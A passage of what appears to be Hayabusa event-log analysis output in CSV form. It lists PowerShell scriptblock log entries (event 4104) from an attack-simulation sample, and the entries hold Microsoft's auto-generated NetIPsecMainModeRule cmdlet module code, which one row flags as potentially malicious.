$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 